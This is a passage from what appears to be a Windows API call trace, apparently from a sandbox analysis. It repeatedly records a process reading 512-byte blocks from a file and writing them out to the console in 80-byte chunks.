lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, 
lpOverlapped=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.359] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.359] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] GetFileType (hFile=0x50) returned 0x1 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.359] WriteFile (in: hFile=0x50, 
lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] GetFileType (hFile=0x50) returned 0x1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] GetFileType (hFile=0x50) returned 0x1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] GetFileType (hFile=0x50) returned 0x1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.360] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.360] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] GetFileType (hFile=0x50) returned 0x1 [0214.360] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0214.360] GetFileType (hFile=0x50) returned 0x1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] GetFileType (hFile=0x50) returned 0x1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] GetFileType (hFile=0x50) returned 0x1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.360] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 
[0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.361] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.361] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, 
lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.361] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: 
lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.362] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.362] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] GetFileType (hFile=0x50) returned 0x1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] GetFileType (hFile=0x50) returned 0x1 [0214.363] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0214.363] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] GetFileType (hFile=0x50) returned 0x1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] GetFileType (hFile=0x50) returned 0x1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] GetFileType (hFile=0x50) returned 0x1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.363] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.363] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] 
GetFileType (hFile=0x50) returned 0x1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] GetFileType (hFile=0x50) returned 0x1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] GetFileType (hFile=0x50) returned 0x1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] GetFileType (hFile=0x50) returned 0x1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] GetFileType (hFile=0x50) returned 0x1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] GetFileType (hFile=0x50) returned 0x1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 
[0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] GetFileType (hFile=0x50) returned 0x1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] GetFileType (hFile=0x50) returned 0x1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.364] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.364] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] GetFileType (hFile=0x50) returned 0x1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] GetFileType (hFile=0x50) returned 0x1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] GetFileType (hFile=0x50) returned 0x1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] GetFileType (hFile=0x50) returned 0x1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] GetFileType (hFile=0x50) returned 0x1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] GetFileType (hFile=0x50) returned 0x1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] GetFileType (hFile=0x50) returned 0x1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] GetFileType (hFile=0x50) returned 0x1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.365] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.366] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] GetFileType (hFile=0x50) returned 0x1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] GetFileType (hFile=0x50) returned 0x1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] GetFileType (hFile=0x50) returned 0x1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] GetFileType (hFile=0x50) returned 0x1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] GetFileType 
(hFile=0x50) returned 0x1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] GetFileType (hFile=0x50) returned 0x1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] GetFileType (hFile=0x50) returned 0x1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, 